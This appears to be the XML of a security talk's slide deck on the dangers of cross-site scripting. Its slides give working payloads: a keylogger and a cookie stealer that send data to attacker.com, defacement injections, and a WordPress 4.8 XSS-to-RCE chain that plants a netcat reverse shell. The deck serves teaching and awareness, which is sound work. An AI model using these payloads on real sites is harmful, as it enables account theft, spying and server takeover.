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slide" Target="slides/slide43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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://knoxss.me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youtube.com/watch?v=i8mTYicEQrI" TargetMode="External"/><Relationship Id="rId4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brutelogic.com.br/blog" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://brutelogic.com.br/cheatsheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/i8mTYicEQrI" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/26V01iIjeGk" TargetMode="External"/><Relationship Id="rId7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266375" y="283225"/>
            <a:ext cx="5936700" cy="4170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0">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>XSS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sz="52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5200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349050" y="3728475"/>
            <a:ext cx="8445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900"/>
              <a:t>What can be really done with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-Site Scripting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6340387" y="3083600"/>
            <a:ext cx="2435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For the win!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="cr7-ftw.png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075" y="338999"/>
            <a:ext cx="2436212" cy="268077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3246875" y="4453825"/>
            <a:ext cx="29562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by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@brutelogic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4418400"/>
            <a:ext cx="8520600" cy="45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Let’s take the blue pill.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526950" y="1374175"/>
            <a:ext cx="35007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Virtual</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Theater_Masks.png"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762" y="0"/>
            <a:ext cx="250507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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1815875"/>
            <a:ext cx="8520600" cy="200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5000">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Defacement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Virtual Defacement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4344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XSS that alters the visual of the page for the victim, spreading attacker’s message or fake news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Might impact business or influence someone’s decision (like buy/sell of stocks or btc)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ark-reading-defacement.png"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824" y="1383274"/>
            <a:ext cx="4046474" cy="268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413650" y="1566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Simple defacement injection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26546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&lt;img src=//attacker.com/picture.jpg style=width:100%;height:100%&gt;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235125" y="4064650"/>
            <a:ext cx="8520600" cy="5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“Loss! Hacker known as ‘Brute Logic’ steals a fortune from Globo’s journalist”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="deface-virtual-brasil.jpg"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848" y="476174"/>
            <a:ext cx="4902453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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="235125" y="4384400"/>
            <a:ext cx="8520600" cy="5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(headline)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Targeted code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189575"/>
            <a:ext cx="8520600" cy="3704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&lt;iframe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src="//www.tribunahoje.com/noticia/148537/entretenimento/2015/07/17/prejuizo-hacker-rouba-verdadeira-fortuna-de-jornalista-global.html"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style="border:0;position:absolute;top:0;left:0;right:0;bottom:0;width:100%;height:100%"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onload="parent.frames[0].document.getElementsByTagName('h1')[1].innerHTML='Prejuizo! Hacker conhecido como \'Brute Logic\' rouba verdadeira fortuna de jornalista global'"&gt;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-64800"/>
            <a:ext cx="8520600" cy="3508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5000">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>LSD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4418400"/>
            <a:ext cx="8520600" cy="45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Trust no one.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584125" y="3228875"/>
            <a:ext cx="80664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Leakage, Spying and Deceiving</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="lsd1.png"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725" y="906174"/>
            <a:ext cx="3998100" cy="28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LSD - Leakage, Spying and Deceiving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152475"/>
            <a:ext cx="4997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Leakage: any private info accessible by js is easily exfiltrated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Spying: what victim type can be logged and sent anywhere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Deceiving: by presenting a fake login form, victim’s credentials are taken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gic.gif"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350" y="1565775"/>
            <a:ext cx="261937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4663900" y="711775"/>
            <a:ext cx="3999900" cy="384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/>
              <a:t>keys = '';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/>
              <a:t>document.onkeypress = function(e) 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/>
              <a:t>     get = window.event?event:e;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/>
              <a:t>     key = get.keyCode?get.keyCode:get.charCode;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/>
              <a:t>     key = String.fromCharCode(key);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/>
              <a:t>     keys += key;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/>
              <a:t>}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/>
              <a:t>setInterval(function(){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/>
              <a:t>     fetch('//attacker.com/k.php?k=' + keys);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/>
              <a:t>     keys = '';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/>
              <a:t>}, 1000);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2122475"/>
            <a:ext cx="3999900" cy="294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&lt;?php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$k = $_GET["k"];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if (!empty(k)) {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     $f = fopen("log.txt", "a+");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     fwrite($f, $k);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     fclose($f);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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4663900" y="264975"/>
            <a:ext cx="1161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$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>k.js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311700" y="1668525"/>
            <a:ext cx="1161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$ cat k.php</a:t>
            </a:r>
          </a:p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4104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XSS Keylogger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311700" y="4288400"/>
            <a:ext cx="8520600" cy="40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Keylogging with XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="xss-keylogging.gif"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509750"/>
            <a:ext cx="57150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311700" y="4418400"/>
            <a:ext cx="8520600" cy="45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My other account is your account.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492975" y="725075"/>
            <a:ext cx="35007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Account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="id-fraud.png"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50" y="3294924"/>
            <a:ext cx="1805250" cy="184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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1136100"/>
            <a:ext cx="8520600" cy="200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0">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Stealing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rute.png"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650" y="0"/>
            <a:ext cx="4526337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Whoami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152475"/>
            <a:ext cx="4305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Security Researcher at Sucuri Security (a GoDaddy company)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XSS, filter/WAF bypass and… bash!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Helped to fix more than 1000 XSS vulnerabilities in www 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Actually developing/maintaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>KNOXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> an online XSS tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Sucuri_Inc._logo.png" id="72" name="Shape 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349" y="3879976"/>
            <a:ext cx="3440225" cy="872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ddy-logo.png" id="73" name="Shape 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5075" y="3924637"/>
            <a:ext cx="532574" cy="78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Account Stealing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152475"/>
            <a:ext cx="4321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Session cookies can be exfiltrated (except httpOnly ones)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Unprotected password/email/phone number change functionality can be abused to compromise account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2fa-data.png"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475" y="1289687"/>
            <a:ext cx="4206300" cy="2564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1657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Short js code to steal cookies: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11700" y="2719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fetch(‘//attacker.com/?cookie=’+document.cookie)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p-unprotected-pass-change.png"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974" y="445024"/>
            <a:ext cx="5476050" cy="35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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289600" y="4224550"/>
            <a:ext cx="8520600" cy="58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Unprotected password change in wordpress.com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ndows-crash.png"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449" y="306800"/>
            <a:ext cx="4471849" cy="17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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4418400"/>
            <a:ext cx="8520600" cy="45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Welcome to my box.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492975" y="657100"/>
            <a:ext cx="35007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Memory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616275" y="3217600"/>
            <a:ext cx="20280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Vector</a:t>
            </a:r>
          </a:p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311700" y="1136100"/>
            <a:ext cx="8520600" cy="200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0">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Corruption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Memory Corruption Vector</a:t>
            </a:r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311700" y="1152475"/>
            <a:ext cx="3551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By simply firing a request to a web server with an exploit, an attacker can compromise the underlying machine of the victim.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="morpheus-what-you-see.jpg"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800" y="1417625"/>
            <a:ext cx="476250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311700" y="4395775"/>
            <a:ext cx="8520600" cy="67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Metasploit Browser Autopwn 2 loaded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="browser-autopwn2.png"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227" y="400637"/>
            <a:ext cx="6337175" cy="393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8032475" y="543800"/>
            <a:ext cx="65256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458975" y="16572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Unleashing the Metasploit beast:</a:t>
            </a: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311700" y="25347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&lt;img src=//attacker.com&gt;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311700" y="4418400"/>
            <a:ext cx="8520600" cy="45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XSS is my hero.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526950" y="827025"/>
            <a:ext cx="35007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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Shape 251"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1136100"/>
            <a:ext cx="8520600" cy="200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0">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="agent_smith.png"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375" y="1344375"/>
            <a:ext cx="5315100" cy="3799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gent_smith.png"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925" y="1344375"/>
            <a:ext cx="5315100" cy="3799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gent_smith.png"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300" y="1344375"/>
            <a:ext cx="5315100" cy="379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XSS Worm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311700" y="1152475"/>
            <a:ext cx="3914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Rogue js code can spread itself across the database of web app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Exponential growth in social apps, possibility of total compromise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="tweetdeck-worm.png"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49" y="1488874"/>
            <a:ext cx="4447750" cy="27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XSS Worm</a:t>
            </a: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311700" y="1152475"/>
            <a:ext cx="3461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An worm in action can be seen here (lab experiment)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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr descr="Watch an XSS worm infecting users of a social network coded from scratch. For more info check:  http://brutelogic.com.br/blog/genesis-xss-worm-part-i http://brutelogic.com.br/blog/genesis-xss-worm-part-ii http://brutelogic.com.br/blog/genesis-xss-worm-part-iii  Music by audionautix.com" id="268" name="Shape 268" title="The Genesis of an XSS Worm">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4042050" y="1219825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Fast Intro to XSS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Dangers of XSS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Virtual Defacement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LSD - Leakage, Spying and Deceiving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Account Stealing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Memory Corruption Vector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XSS Worm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CMS Pwnage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Miscellaneous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Less Dangerous Outcomes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Easiness of XSS Delivery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References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xss-everywhere.jpg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950" y="989648"/>
            <a:ext cx="4152475" cy="31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311700" y="-76150"/>
            <a:ext cx="8520600" cy="200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5000">
                <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>CMS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311700" y="4418400"/>
            <a:ext cx="8520600" cy="45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Hey admin, give me admin!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606275" y="3126875"/>
            <a:ext cx="35007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Pwnage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="WordPress-Logo-PNG-Image.png"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550" y="1122050"/>
            <a:ext cx="3028325" cy="30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CMS Pwnage</a:t>
            </a:r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311700" y="1152475"/>
            <a:ext cx="42540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If an administrator of a CMS install gets XSSed, RCE is straightforward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Get the anti-CSRF token then submit with it to edit or upload code to server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="rce-all-the-things.jpg"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325" y="1495388"/>
            <a:ext cx="3845900" cy="273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518200" y="4224550"/>
            <a:ext cx="8520600" cy="58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https://w3techs.com/technologies/overview/content_management/all</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="w3-stats-cms.png"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025" y="569625"/>
            <a:ext cx="58102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Wordpress 4.8 - XSS to RCE</a:t>
            </a:r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311700" y="1152475"/>
            <a:ext cx="47184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Targeting Hello Dolly plugin, vanilla install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200 OK for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/wordpress/wp-content/plugins/hello.php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ovelha-dolly.png"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625" y="1152475"/>
            <a:ext cx="27813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Wordpress 4.8 - XSS to RCE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Defining some vars (path, file and payload)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p = '/wordpress/wp-admin/plugin-editor.php?';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q = 'file=hello.php';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 = '&lt;?=`nc attacker.com 5855 -e /bin/bash`;';  // reverse shell to attacker.com:5855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js-logo.png"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525" y="141350"/>
            <a:ext cx="1180050" cy="11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Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4.8 - XSS to RCE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Grabbing anti-CSRF token ( _wpnonce) and preparing content update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 = new XMLHttpRequest();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a.open('GET', p+q, 0);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a.send();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$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] + '&amp;newcontent=' + s + '&amp;action=update&amp;' + q;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js-logo.png"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5125" y="141350"/>
            <a:ext cx="1180050" cy="11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Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4.8 - XSS to RCE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Submitting plugin edition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b = new XMLHttpRequest();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b.open('POST', p+q, 1);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b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');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b.send($);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js-logo.png"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900" y="141350"/>
            <a:ext cx="1180050" cy="11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Wordpress </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4.8 - XSS to RCE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Executing payload by firing a request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b.onreadystatechange = function(){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if (this.readyState == 4) {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fetch('/wordpress/wp-content/plugins/hello.php');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js-logo.png"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5125" y="141350"/>
            <a:ext cx="1180050" cy="11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p-xss2rce.gif"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600" y="589600"/>
            <a:ext cx="571500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>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365800" y="4224550"/>
            <a:ext cx="8520600" cy="58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Opening a netcat shell after triggering a stored XSS in WP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Miscellaneous</a:t>
            </a:r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311700" y="1152475"/>
            <a:ext cx="4665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Less Dangerous Outcomes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Forced download of files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Denial of Service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Attacks in mobile or with user permission (geolocation, audio/video capture, plugin install, etc) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="mobile-collage.jpg"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100" y="915625"/>
            <a:ext cx="34164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Fast Intro to XSS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Definition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XSS is javascript code executed by attacker in victim’s browser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Browsers use a programmatic (object oriented) model of HTML documents called DOM (Document Object Model) where every markup element is a DOM node.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Almost anything done in browser is performed only or also by javascript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Miscellaneous</a:t>
            </a:r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Easiness of XSS Delivery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Easily shared in social networks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Disguised by URL shortening services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Spam, spear phishing and watering hole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="social-media-clipart-png-11.jpg"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9975" y="1017712"/>
            <a:ext cx="3321922" cy="3321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Miscellaneous</a:t>
            </a:r>
          </a:p>
        </p:txBody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References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http://brutelogic.com.br/blog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http://brutelogic.com.br/cheatsheet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https://youtu.be/i8mTYicEQrI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https://youtu.be/26V01iIjeGk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rute.png" id="351" name="Shape 3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7650" y="0"/>
            <a:ext cx="4526337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ucky-once.jpeg"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428625"/>
            <a:ext cx="85725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-big.png"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4686587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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608400" y="4246325"/>
            <a:ext cx="553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#hack2learn</a:t>
            </a:r>
          </a:p>
        </p:txBody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3608400" y="393425"/>
            <a:ext cx="5535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/>
              <a:t>Thank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7200"/>
              <a:t>You!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3608400" y="3602700"/>
            <a:ext cx="55356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@brutelogic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Fast Intro to XSS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Classical Example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 Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP Source Code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marR="292100" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="44444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69850" lvl="0" marL="292100" marR="292100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="230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 sz="1500">
              <a:solidFill>
                <a:srgbClr val="44444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2617750" y="2685025"/>
            <a:ext cx="41577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$username = $_GET[“user”];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echo “&lt;h1&gt;Hello, $username!&lt;/h1&gt;”;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Fast Intro to XSS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Classical Example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Reflection of User Controlled Input “John”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xss101-1.png"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662" y="2361125"/>
            <a:ext cx="7370675" cy="215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Fast Intro to XSS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Classical Example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Execution of Script Block via User Input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xss101-2.png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950" y="2322625"/>
            <a:ext cx="7938600" cy="232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Fast Intro to XSS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Main Types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Server based: attack comes in server’s response (99,99% in source code), directly with input (reflected) or indirectly with a previously saved input (stored);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Client based: rogue input is treated by native javascript code of the page and gets executed directly or indirectly in the same way as above. Aka DOM-based XSS.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Dangers of XSS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one-does-not-alert-boxes.jpg"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4337"/>
            <a:ext cx="4068250" cy="2692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Shape 121"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4650812" y="1172387"/>
            <a:ext cx="4181487" cy="3376575"/>
            <a:chOff x="4701887" y="1549625"/>
            <a:chExt cx="4181487" cy="3376575"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr descr="chrome-alert-1.png" id="122" name="Shape 1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01887" y="1549625"/>
              <a:ext cx="4181475" cy="1400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f-alert-1.png" id="123" name="Shape 1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02075" y="3268850"/>
              <a:ext cx="2781300" cy="165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e-alert-1.png" id="124" name="Shape 1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17975" y="2575537"/>
              <a:ext cx="1733550" cy="1609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